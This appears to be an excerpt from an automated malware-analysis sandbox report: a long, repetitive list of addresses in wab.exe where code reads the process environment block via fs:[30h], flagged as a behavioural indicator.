Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20292349 mov eax, dword ptr fs:[00000030h] 12_2_20292349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20292349 mov eax, dword ptr fs:[00000030h] 12_2_20292349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20292349 mov eax, dword ptr fs:[00000030h] 12_2_20292349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20292349 mov eax, dword ptr fs:[00000030h] 12_2_20292349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20292349 mov eax, dword ptr fs:[00000030h] 12_2_20292349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20292349 mov eax, dword ptr fs:[00000030h] 12_2_20292349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20292349 mov eax, dword ptr fs:[00000030h] 12_2_20292349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020D34C mov eax, dword ptr fs:[00000030h] 12_2_2020D34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020D34C mov eax, dword ptr fs:[00000030h] 12_2_2020D34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E5341 mov eax, dword ptr fs:[00000030h] 12_2_202E5341
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20209353 mov eax, dword ptr fs:[00000030h] 12_2_20209353
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20209353 mov eax, dword ptr fs:[00000030h] 12_2_20209353
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2029035C mov eax, dword ptr fs:[00000030h] 12_2_2029035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2029035C mov eax, dword ptr fs:[00000030h] 12_2_2029035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2029035C mov eax, dword ptr fs:[00000030h] 12_2_2029035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2029035C mov ecx, dword ptr fs:[00000030h] 12_2_2029035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2029035C mov eax, dword ptr fs:[00000030h] 12_2_2029035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2029035C mov eax, dword ptr fs:[00000030h] 12_2_2029035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202DA352 mov eax, dword ptr fs:[00000030h] 12_2_202DA352
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202433A0 mov eax, dword ptr fs:[00000030h] 12_2_202433A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202433A0 mov eax, dword ptr fs:[00000030h] 12_2_202433A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202333A5 mov eax, dword ptr fs:[00000030h] 12_2_202333A5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020E388 mov eax, dword ptr fs:[00000030h] 12_2_2020E388
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020E388 mov eax, dword ptr fs:[00000030h] 12_2_2020E388
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020E388 mov eax, dword ptr fs:[00000030h] 12_2_2020E388
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023438F mov eax, dword ptr fs:[00000030h] 12_2_2023438F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023438F mov eax, dword ptr fs:[00000030h] 12_2_2023438F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E539D mov eax, dword ptr fs:[00000030h] 12_2_202E539D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20208397 mov eax, dword ptr fs:[00000030h] 12_2_20208397
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20208397 mov eax, dword ptr fs:[00000030h] 12_2_20208397
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20208397 mov eax, dword ptr fs:[00000030h] 12_2_20208397
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2026739A mov eax, dword ptr fs:[00000030h] 12_2_2026739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2026739A mov eax, dword ptr fs:[00000030h] 12_2_2026739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202CF3E6 mov eax, dword ptr fs:[00000030h] 12_2_202CF3E6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202203E9 mov eax, dword ptr fs:[00000030h] 12_2_202203E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202203E9 mov eax, dword ptr fs:[00000030h] 12_2_202203E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202203E9 mov eax, dword ptr fs:[00000030h] 12_2_202203E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202203E9 mov eax, dword ptr fs:[00000030h] 12_2_202203E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202203E9 mov eax, dword ptr fs:[00000030h] 12_2_202203E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202203E9 mov eax, dword ptr fs:[00000030h] 12_2_202203E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202203E9 mov eax, dword ptr fs:[00000030h] 12_2_202203E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202203E9 mov eax, dword ptr fs:[00000030h] 12_2_202203E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E53FC mov eax, dword ptr fs:[00000030h] 12_2_202E53FC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022E3F0 mov eax, dword ptr fs:[00000030h] 12_2_2022E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022E3F0 mov eax, dword ptr fs:[00000030h] 12_2_2022E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022E3F0 mov eax, dword ptr fs:[00000030h] 12_2_2022E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202463FF mov eax, dword ptr fs:[00000030h] 12_2_202463FF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202CC3CD mov eax, dword ptr fs:[00000030h] 12_2_202CC3CD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021A3C0 mov eax, dword ptr fs:[00000030h] 12_2_2021A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021A3C0 mov eax, dword ptr fs:[00000030h] 12_2_2021A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021A3C0 mov eax, dword ptr fs:[00000030h] 12_2_2021A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021A3C0 mov eax, dword ptr fs:[00000030h] 12_2_2021A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021A3C0 mov eax, dword ptr fs:[00000030h] 12_2_2021A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021A3C0 mov eax, dword ptr fs:[00000030h] 12_2_2021A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202183C0 mov eax, dword ptr fs:[00000030h] 12_2_202183C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202183C0 mov eax, dword ptr fs:[00000030h] 12_2_202183C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202183C0 mov eax, dword ptr fs:[00000030h] 12_2_202183C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202183C0 mov eax, dword ptr fs:[00000030h] 12_2_202183C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202CB3D0 mov ecx, dword ptr fs:[00000030h] 12_2_202CB3D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020E420 mov eax, dword ptr fs:[00000030h] 12_2_2020E420
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020E420 mov eax, dword ptr fs:[00000030h] 12_2_2020E420
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020E420 mov eax, dword ptr fs:[00000030h] 12_2_2020E420
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020C427 mov eax, dword ptr fs:[00000030h] 12_2_2020C427
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024A430 mov eax, dword ptr fs:[00000030h] 12_2_2024A430
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20248402 mov eax, dword ptr fs:[00000030h] 12_2_20248402
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20248402 mov eax, dword ptr fs:[00000030h] 12_2_20248402
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20248402 mov eax, dword ptr fs:[00000030h] 12_2_20248402
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023340D mov eax, dword ptr fs:[00000030h] 12_2_2023340D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20211460 mov eax, dword ptr fs:[00000030h] 12_2_20211460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20211460 mov eax, dword ptr fs:[00000030h] 12_2_20211460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20211460 mov eax, dword ptr fs:[00000030h] 12_2_20211460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20211460 mov eax, dword ptr fs:[00000030h] 12_2_20211460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20211460 mov eax, dword ptr fs:[00000030h] 12_2_20211460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022F460 mov eax, dword ptr fs:[00000030h] 12_2_2022F460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022F460 mov eax, dword ptr fs:[00000030h] 12_2_2022F460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022F460 mov eax, dword ptr fs:[00000030h] 12_2_2022F460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022F460 mov eax, dword ptr fs:[00000030h] 12_2_2022F460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022F460 mov eax, dword ptr fs:[00000030h] 12_2_2022F460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2022F460 mov eax, dword ptr fs:[00000030h] 12_2_2022F460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E547F mov eax, dword ptr fs:[00000030h] 12_2_202E547F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023A470 mov eax, dword ptr fs:[00000030h] 12_2_2023A470
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023A470 mov eax, dword ptr fs:[00000030h] 12_2_2023A470
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023A470 mov eax, dword ptr fs:[00000030h] 12_2_2023A470
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021B440 mov eax, dword ptr fs:[00000030h] 12_2_2021B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021B440 mov eax, dword ptr fs:[00000030h] 12_2_2021B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021B440 mov eax, dword ptr fs:[00000030h] 12_2_2021B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021B440 mov eax, dword ptr fs:[00000030h] 12_2_2021B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021B440 mov eax, dword ptr fs:[00000030h] 12_2_2021B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021B440 mov eax, dword ptr fs:[00000030h] 12_2_2021B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024E443 mov eax, dword ptr fs:[00000030h] 12_2_2024E443
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024E443 mov eax, dword ptr fs:[00000030h] 12_2_2024E443
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024E443 mov eax, dword ptr fs:[00000030h] 12_2_2024E443
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024E443 mov eax, dword ptr fs:[00000030h] 12_2_2024E443
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024E443 mov eax, dword ptr fs:[00000030h] 12_2_2024E443
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024E443 mov eax, dword ptr fs:[00000030h] 12_2_2024E443
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024E443 mov eax, dword ptr fs:[00000030h] 12_2_2024E443
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024E443 mov eax, dword ptr fs:[00000030h] 12_2_2024E443
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023245A mov eax, dword ptr fs:[00000030h] 12_2_2023245A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020645D mov eax, dword ptr fs:[00000030h] 12_2_2020645D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202CF453 mov eax, dword ptr fs:[00000030h] 12_2_202CF453
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202164AB mov eax, dword ptr fs:[00000030h] 12_2_202164AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202434B0 mov eax, dword ptr fs:[00000030h] 12_2_202434B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202444B0 mov ecx, dword ptr fs:[00000030h] 12_2_202444B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2029A4B0 mov eax, dword ptr fs:[00000030h] 12_2_2029A4B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020B480 mov eax, dword ptr fs:[00000030h] 12_2_2020B480
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20219486 mov eax, dword ptr fs:[00000030h] 12_2_20219486
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20219486 mov eax, dword ptr fs:[00000030h] 12_2_20219486
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202104E5 mov ecx, dword ptr fs:[00000030h] 12_2_202104E5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202B94E0 mov eax, dword ptr fs:[00000030h] 12_2_202B94E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E54DB mov eax, dword ptr fs:[00000030h] 12_2_202E54DB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202CB52F mov eax, dword ptr fs:[00000030h] 12_2_202CB52F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202BF525 mov eax, dword ptr fs:[00000030h] 12_2_202BF525
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202BF525 mov eax, dword ptr fs:[00000030h] 12_2_202BF525
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202BF525 mov eax, dword ptr fs:[00000030h] 12_2_202BF525
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202BF525 mov eax, dword ptr fs:[00000030h] 12_2_202BF525
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202BF525 mov eax, dword ptr fs:[00000030h] 12_2_202BF525
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202BF525 mov eax, dword ptr fs:[00000030h] 12_2_202BF525
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202BF525 mov eax, dword ptr fs:[00000030h] 12_2_202BF525
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024D530 mov eax, dword ptr fs:[00000030h] 12_2_2024D530
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024D530 mov eax, dword ptr fs:[00000030h] 12_2_2024D530
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021D534 mov eax, dword ptr fs:[00000030h] 12_2_2021D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021D534 mov eax, dword ptr fs:[00000030h] 12_2_2021D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021D534 mov eax, dword ptr fs:[00000030h] 12_2_2021D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021D534 mov eax, dword ptr fs:[00000030h] 12_2_2021D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021D534 mov eax, dword ptr fs:[00000030h] 12_2_2021D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2021D534 mov eax, dword ptr fs:[00000030h] 12_2_2021D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20220535 mov eax, dword ptr fs:[00000030h] 12_2_20220535
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20220535 mov eax, dword ptr fs:[00000030h] 12_2_20220535
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20220535 mov eax, dword ptr fs:[00000030h] 12_2_20220535
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20220535 mov eax, dword ptr fs:[00000030h] 12_2_20220535
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20220535 mov eax, dword ptr fs:[00000030h] 12_2_20220535
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20220535 mov eax, dword ptr fs:[00000030h] 12_2_20220535
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E5537 mov eax, dword ptr fs:[00000030h] 12_2_202E5537
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023E53E mov eax, dword ptr fs:[00000030h] 12_2_2023E53E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023E53E mov eax, dword ptr fs:[00000030h] 12_2_2023E53E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023E53E mov eax, dword ptr fs:[00000030h] 12_2_2023E53E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023E53E mov eax, dword ptr fs:[00000030h] 12_2_2023E53E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023E53E mov eax, dword ptr fs:[00000030h] 12_2_2023E53E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20247505 mov eax, dword ptr fs:[00000030h] 12_2_20247505
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20247505 mov ecx, dword ptr fs:[00000030h] 12_2_20247505
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E4500 mov eax, dword ptr fs:[00000030h] 12_2_202E4500
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E4500 mov eax, dword ptr fs:[00000030h] 12_2_202E4500
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E4500 mov eax, dword ptr fs:[00000030h] 12_2_202E4500
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E4500 mov eax, dword ptr fs:[00000030h] 12_2_202E4500
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E4500 mov eax, dword ptr fs:[00000030h] 12_2_202E4500
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E4500 mov eax, dword ptr fs:[00000030h] 12_2_202E4500
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E4500 mov eax, dword ptr fs:[00000030h] 12_2_202E4500
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020B562 mov eax, dword ptr fs:[00000030h] 12_2_2020B562
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024656A mov eax, dword ptr fs:[00000030h] 12_2_2024656A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024656A mov eax, dword ptr fs:[00000030h] 12_2_2024656A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024656A mov eax, dword ptr fs:[00000030h] 12_2_2024656A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024B570 mov eax, dword ptr fs:[00000030h] 12_2_2024B570
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024B570 mov eax, dword ptr fs:[00000030h] 12_2_2024B570
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20218550 mov eax, dword ptr fs:[00000030h] 12_2_20218550
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20218550 mov eax, dword ptr fs:[00000030h] 12_2_20218550
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202315A9 mov eax, dword ptr fs:[00000030h] 12_2_202315A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202315A9 mov eax, dword ptr fs:[00000030h] 12_2_202315A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202315A9 mov eax, dword ptr fs:[00000030h] 12_2_202315A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202315A9 mov eax, dword ptr fs:[00000030h] 12_2_202315A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202315A9 mov eax, dword ptr fs:[00000030h] 12_2_202315A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202905A7 mov eax, dword ptr fs:[00000030h] 12_2_202905A7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202905A7 mov eax, dword ptr fs:[00000030h] 12_2_202905A7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202905A7 mov eax, dword ptr fs:[00000030h] 12_2_202905A7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202A35BA mov eax, dword ptr fs:[00000030h] 12_2_202A35BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202A35BA mov eax, dword ptr fs:[00000030h] 12_2_202A35BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202A35BA mov eax, dword ptr fs:[00000030h] 12_2_202A35BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202A35BA mov eax, dword ptr fs:[00000030h] 12_2_202A35BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202CF5BE mov eax, dword ptr fs:[00000030h] 12_2_202CF5BE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202345B1 mov eax, dword ptr fs:[00000030h] 12_2_202345B1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202345B1 mov eax, dword ptr fs:[00000030h] 12_2_202345B1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023F5B0 mov eax, dword ptr fs:[00000030h] 12_2_2023F5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023F5B0 mov eax, dword ptr fs:[00000030h] 12_2_2023F5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023F5B0 mov eax, dword ptr fs:[00000030h] 12_2_2023F5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023F5B0 mov eax, dword ptr fs:[00000030h] 12_2_2023F5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023F5B0 mov eax, dword ptr fs:[00000030h] 12_2_2023F5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023F5B0 mov eax, dword ptr fs:[00000030h] 12_2_2023F5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023F5B0 mov eax, dword ptr fs:[00000030h] 12_2_2023F5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023F5B0 mov eax, dword ptr fs:[00000030h] 12_2_2023F5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023F5B0 mov eax, dword ptr fs:[00000030h] 12_2_2023F5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20212582 mov eax, dword ptr fs:[00000030h] 12_2_20212582
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20212582 mov ecx, dword ptr fs:[00000030h] 12_2_20212582
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20244588 mov eax, dword ptr fs:[00000030h] 12_2_20244588
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020758F mov eax, dword ptr fs:[00000030h] 12_2_2020758F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020758F mov eax, dword ptr fs:[00000030h] 12_2_2020758F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2020758F mov eax, dword ptr fs:[00000030h] 12_2_2020758F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024E59C mov eax, dword ptr fs:[00000030h] 12_2_2024E59C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2029B594 mov eax, dword ptr fs:[00000030h] 12_2_2029B594
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2029B594 mov eax, dword ptr fs:[00000030h] 12_2_2029B594
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202125E0 mov eax, dword ptr fs:[00000030h] 12_2_202125E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023E5E7 mov eax, dword ptr fs:[00000030h] 12_2_2023E5E7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023E5E7 mov eax, dword ptr fs:[00000030h] 12_2_2023E5E7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023E5E7 mov eax, dword ptr fs:[00000030h] 12_2_2023E5E7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023E5E7 mov eax, dword ptr fs:[00000030h] 12_2_2023E5E7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023E5E7 mov eax, dword ptr fs:[00000030h] 12_2_2023E5E7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023E5E7 mov eax, dword ptr fs:[00000030h] 12_2_2023E5E7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023E5E7 mov eax, dword ptr fs:[00000030h] 12_2_2023E5E7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2023E5E7 mov eax, dword ptr fs:[00000030h] 12_2_2023E5E7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024C5ED mov eax, dword ptr fs:[00000030h] 12_2_2024C5ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024C5ED mov eax, dword ptr fs:[00000030h] 12_2_2024C5ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202315F4 mov eax, dword ptr fs:[00000030h] 12_2_202315F4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202315F4 mov eax, dword ptr fs:[00000030h] 12_2_202315F4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202315F4 mov eax, dword ptr fs:[00000030h] 12_2_202315F4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202315F4 mov eax, dword ptr fs:[00000030h] 12_2_202315F4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202315F4 mov eax, dword ptr fs:[00000030h] 12_2_202315F4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202315F4 mov eax, dword ptr fs:[00000030h] 12_2_202315F4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202455C0 mov eax, dword ptr fs:[00000030h] 12_2_202455C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202E55C9 mov eax, dword ptr fs:[00000030h] 12_2_202E55C9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024E5CF mov eax, dword ptr fs:[00000030h] 12_2_2024E5CF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024E5CF mov eax, dword ptr fs:[00000030h] 12_2_2024E5CF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202165D0 mov eax, dword ptr fs:[00000030h] 12_2_202165D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024A5D0 mov eax, dword ptr fs:[00000030h] 12_2_2024A5D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2024A5D0 mov eax, dword ptr fs:[00000030h] 12_2_2024A5D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2028D5D0 mov eax, dword ptr fs:[00000030h] 12_2_2028D5D0
